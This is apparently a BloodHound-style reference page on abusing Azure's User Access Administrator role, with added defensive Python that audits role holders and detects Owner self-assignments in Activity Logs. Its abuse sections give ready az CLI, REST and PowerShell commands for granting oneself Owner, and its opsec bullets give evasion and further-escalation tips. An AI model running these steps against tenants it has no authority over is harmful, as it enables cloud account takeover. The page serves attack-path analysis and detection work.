AZUserAccessAdmin

The source principal holds the User Access Administrator role on an Azure resource scope, allowing it to assign any Azure RBAC role (including Owner) to any principal on that scope.

Applies to: User / ServicePrincipal → AZSubscription / AZResourceGroup / AZResource
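An audit for the source side of this edge, added here as an example and not part of the original page: it lists every principal holding User Access Administrator (or Owner, which can also write role assignments at its scope) and ranks them by how wide the scope is. The input mirrors the JSON shape of `az role assignment list --all` output; the field names are assumed from that output and every value in the sample is constructed.

```python
"""Audit Azure RBAC assignments for principals that can grant roles.

Added example for this page (not part of the original or of any project).
The records mirror the JSON shape of `az role assignment list --all`
(principalId, principalName, principalType, roleDefinitionId,
roleDefinitionName, scope); those field names are assumed from that output
and every value below is constructed.
"""
import json

# Built-in role definition GUIDs. Owner is the GUID the page lists; User Access
# Administrator is the role this edge describes. Both can write role assignments
# at their scope, so both are the "source" side of this edge.
ROLE_ASSIGNERS = {
    "8e3af657-a8ff-443c-a75c-2fe8c4bcb635": "Owner",
    "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9": "User Access Administrator",
}

SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"  # constructed
ROLE_DEFS = SUB + "/providers/Microsoft.Authorization/roleDefinitions/"

# Constructed sample: one UAA holder at subscription scope, one service
# principal with UAA on a resource group, one Contributor that must not be flagged.
SAMPLE_ASSIGNMENTS = json.dumps([
    {"principalId": "11111111-1111-1111-1111-111111111111",
     "principalName": "alice@example.test", "principalType": "User",
     "roleDefinitionId": ROLE_DEFS + "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9",
     "roleDefinitionName": "User Access Administrator", "scope": SUB},
    {"principalId": "22222222-2222-2222-2222-222222222222",
     "principalName": "ci-deployer", "principalType": "ServicePrincipal",
     "roleDefinitionId": ROLE_DEFS + "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9",
     "roleDefinitionName": "User Access Administrator",
     "scope": SUB + "/resourceGroups/prod-rg"},
    {"principalId": "33333333-3333-3333-3333-333333333333",
     "principalName": "bob@example.test", "principalType": "User",
     "roleDefinitionId": ROLE_DEFS + "b24988ac-6180-42a0-ab88-20f7382dd24c",
     "roleDefinitionName": "Contributor", "scope": SUB},
])

SCOPE_ORDER = {"managementGroup": 0, "subscription": 1, "resourceGroup": 2,
               "resource": 3, "unknown": 4}


def scope_kind(scope):
    """Classify an ARM scope string; a wider scope means a wider blast radius."""
    parts = [p.lower() for p in scope.split("/") if p]
    if parts[:3] == ["providers", "microsoft.management", "managementgroups"]:
        return "managementGroup"
    if parts[:1] == ["subscriptions"]:
        if len(parts) == 2:
            return "subscription"
        if len(parts) == 4 and parts[2] == "resourcegroups":
            return "resourceGroup"
        return "resource"
    return "unknown"


def role_guid(role_definition_id):
    """The trailing GUID identifies the role; the prefix only names the scope it was read from."""
    return role_definition_id.rsplit("/", 1)[-1].lower()


def find_role_assigners(assignments_json):
    """Return every assignment whose role can create further role assignments, widest scope first."""
    findings = []
    for a in json.loads(assignments_json):
        guid = role_guid(a["roleDefinitionId"])
        if guid not in ROLE_ASSIGNERS:
            continue
        findings.append({
            "principal": a.get("principalName") or a["principalId"],
            "principalType": a.get("principalType", "Unknown"),
            "role": ROLE_ASSIGNERS[guid],
            "scope": a["scope"],
            "scopeKind": scope_kind(a["scope"]),
        })
    findings.sort(key=lambda f: SCOPE_ORDER[f["scopeKind"]])
    return findings


if __name__ == "__main__":
    for f in find_role_assigners(SAMPLE_ASSIGNMENTS):
        print(f"{f['scopeKind']:<15} {f['role']:<26} {f['principalType']:<17} "
              f"{f['principal']}  {f['scope']}")
```

Feed it the real output of `az role assignment list --all -o json` instead of the constructed sample to get the list of principals from which this edge originates; service principals holding the role at subscription or management-group scope are the ones to review first.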


Linux Abuse

Assign Owner role to self on subscription (az CLI)

az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>

az role assignment create \
  --assignee <object-id> \
  --role "Owner" \
  --scope "/subscriptions/<subscription-id>"

Assign Owner on resource group

az role assignment create \
  --assignee <object-id> \
  --role "Owner" \
  --scope "/subscriptions/<subscription-id>/resourceGroups/<resource-group>"

Azure Resource Manager REST API — assign Azure RBAC role

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://management.azure.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

ASSIGNMENT_ID=$(uuidgen)
curl -s -X PUT \
  "https://management.azure.com/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleAssignments/${ASSIGNMENT_ID}?api-version=2022-04-01" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "properties": {
      "roleDefinitionId": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/8e3af657-a8ff-443c-a75c-2fe8c4bcb635",
      "principalId": "<object-id>"
    }
  }'

Owner role definition ID: 8e3af657-a8ff-443c-a75c-2fe8c4bcb635


Windows Abuse

Az PowerShell — assign Owner on subscription

Connect-AzAccount -AccessToken <access-token> -AccountId <username>
New-AzRoleAssignment `
  -ObjectId <object-id> `
  -RoleDefinitionName "Owner" `
  -Scope "/subscriptions/<subscription-id>"

Az PowerShell — assign Contributor on resource group

New-AzRoleAssignment `
  -ObjectId <object-id> `
  -RoleDefinitionName "Contributor" `
  -ResourceGroupName <resource-group>

Assign any role by definition ID (custom or built-in; shown with the built-in Virtual Machine Contributor role)

$roleDefId = (Get-AzRoleDefinition -Name "Virtual Machine Contributor").Id
New-AzRoleAssignment `
  -ObjectId <object-id> `
  -RoleDefinitionId $roleDefId `
  -Scope "/subscriptions/<subscription-id>"

Opsec

  • Role assignments are logged in the Azure Activity Log under "Create role assignment."
  • Assigning Owner to a service principal (rather than a user) is less visible in IAM dashboards.
  • Use the minimum required role (Contributor vs Owner) to reduce alert fidelity.
  • After becoming Owner on the subscription, enumerate Key Vaults, Automation Accounts, and VMs for further escalation.
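Detection logic for the Activity Log entries the first bullet refers to, added here as an example and not part of the original page. It reads constructed Activity Log records (field names assumed from the Activity Log event schema) and raises a finding for each successful write of Owner or User Access Administrator, escalating the severity when the caller assigned the role to itself or the assignee is a service principal, the two cases the bullets above describe.

```python
"""Flag high-risk role-assignment writes in Azure Activity Log records.

Added example for this page, not part of the original. The records are
constructed; their field names (operationName.value, status.value, caller,
claims[...objectidentifier], properties.requestbody) are assumed from the
Activity Log event schema, and every GUID and name is made up except the
Owner role GUID the page lists.
"""
import json

ROLE_ASSIGNMENT_WRITE = "microsoft.authorization/roleassignments/write"
OBJECT_ID_CLAIM = "http://schemas.microsoft.com/identity/claims/objectidentifier"
HIGH_PRIVILEGE_ROLES = {
    "8e3af657-a8ff-443c-a75c-2fe8c4bcb635": "Owner",
    "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9": "User Access Administrator",
}
READER_GUID = "acdd72a7-3385-48ef-bd42-f606fba81ae7"  # built-in Reader, not flagged
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"  # constructed
SP_OID = "22222222-2222-2222-2222-222222222222"              # constructed
ADMIN_OID = "99999999-9999-9999-9999-999999999999"           # constructed


def _event(ts, caller, caller_oid, status, principal_id, principal_type, role, scope):
    """Build one constructed Activity Log record in the shape the detector reads."""
    body = {"Properties": {"PrincipalId": principal_id, "PrincipalType": principal_type,
                           "RoleDefinitionId": f"{SUB}/providers/Microsoft.Authorization/roleDefinitions/{role}",
                           "Scope": scope}}
    return {"eventTimestamp": ts, "caller": caller,
            "operationName": {"value": "Microsoft.Authorization/roleAssignments/write",
                              "localizedValue": "Create role assignment"},
            "status": {"value": status},
            "claims": {OBJECT_ID_CLAIM: caller_oid},
            "properties": {"requestbody": json.dumps(body)}}


SAMPLE_EVENTS = [
    # service principal grants Owner to itself on the subscription: worst case
    _event("2024-01-01T10:00:00Z", "ci-deployer", SP_OID, "Succeeded", SP_OID,
           "ServicePrincipal", "8e3af657-a8ff-443c-a75c-2fe8c4bcb635", SUB),
    # routine Reader grant by an admin: ignored
    _event("2024-01-01T10:05:00Z", "admin@example.test", ADMIN_OID, "Succeeded",
           "33333333-3333-3333-3333-333333333333", "User", READER_GUID, SUB),
    # admin grants User Access Administrator to another user: worth a look
    _event("2024-01-01T10:10:00Z", "admin@example.test", ADMIN_OID, "Succeeded",
           "44444444-4444-4444-4444-444444444444", "User",
           "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9", SUB + "/resourceGroups/prod-rg"),
    # denied Owner attempt: the write never happened, so it is not a grant
    _event("2024-01-01T10:15:00Z", "ci-deployer", SP_OID, "Failed", SP_OID,
           "ServicePrincipal", "8e3af657-a8ff-443c-a75c-2fe8c4bcb635", SUB),
]


def _ci_get(d, key, default=None):
    """Case-insensitive lookup: key casing differs between Activity Log exports."""
    for k, v in (d or {}).items():
        if k.lower() == key.lower():
            return v
    return default


def analyse_role_assignment_events(records):
    """Return findings for successful writes of Owner or User Access Administrator."""
    findings = []
    for r in records:
        if (_ci_get(r.get("operationName"), "value") or "").lower() != ROLE_ASSIGNMENT_WRITE:
            continue
        if (_ci_get(r.get("status"), "value") or "").lower() != "succeeded":
            continue
        raw = _ci_get(r.get("properties"), "requestbody")
        if not raw:
            continue
        props = _ci_get(json.loads(raw) if isinstance(raw, str) else raw, "properties", {})
        guid = (_ci_get(props, "roleDefinitionId") or "").rsplit("/", 1)[-1].lower()
        if guid not in HIGH_PRIVILEGE_ROLES:
            continue
        principal_id = (_ci_get(props, "principalId") or "").lower()
        caller_oid = (r.get("claims", {}).get(OBJECT_ID_CLAIM) or "").lower()
        reasons = [f"grants {HIGH_PRIVILEGE_ROLES[guid]}"]
        if principal_id and principal_id == caller_oid:
            reasons.append("caller assigned the role to itself")
        if (_ci_get(props, "principalType") or "").lower() == "serviceprincipal":
            reasons.append("assignee is a service principal")
        findings.append({"time": r.get("eventTimestamp"), "caller": r.get("caller"),
                         "principalId": principal_id, "scope": _ci_get(props, "scope"),
                         "severity": "high" if len(reasons) > 1 else "medium",
                         "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse_role_assignment_events(SAMPLE_EVENTS):
        print(f"{f['time']} {f['severity']:<6} {f['caller']} -> {f['principalId']} "
              f"@ {f['scope']}: {'; '.join(f['reasons'])}")
```

The failed attempt is dropped on purpose here because the grant did not happen, but a stream of failed `roleAssignments/write` calls from one caller is itself worth a separate, lower-severity rule; only successful writes change who can reach Owner.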